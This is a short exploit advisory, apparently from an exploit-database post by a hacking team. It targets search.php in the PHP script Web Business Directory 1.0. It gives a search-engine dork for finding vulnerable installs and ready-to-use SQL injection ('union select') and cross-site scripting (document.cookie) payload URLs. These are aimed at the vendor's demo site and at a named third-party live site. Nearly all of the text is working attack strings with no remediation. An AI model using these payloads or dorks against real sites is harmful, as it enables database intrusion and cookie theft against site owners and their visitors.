[&#187;] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities ========== [&#187;] Script: [ Web Business Directory 1.0 ] [&#187;] Language: [ PHP ] [&#187;] Download: [ http://www.phpdirectorysource.com/ ] [&#187;] Founder: [ Moudi <m0udi@9.cn> ] [&#187;] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [&#187;] Team: [ EvilWay ] [&#187;] Dork: [ Copyright 2005-2006 phpDirectorySource&#65533;, all rights reserved ] [&#187;] Price: [ $75.00 ] [&#187;] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit SQL INJECTION + LIVE : vulnerability ]=== [&#187;] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [&#187;] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* [&#187;] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* ===[ Exploit XSS + LIVE : vulnerability ]=== [&#187;] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [&#187;] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script> [&#187;] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script> Author: Moudi ##############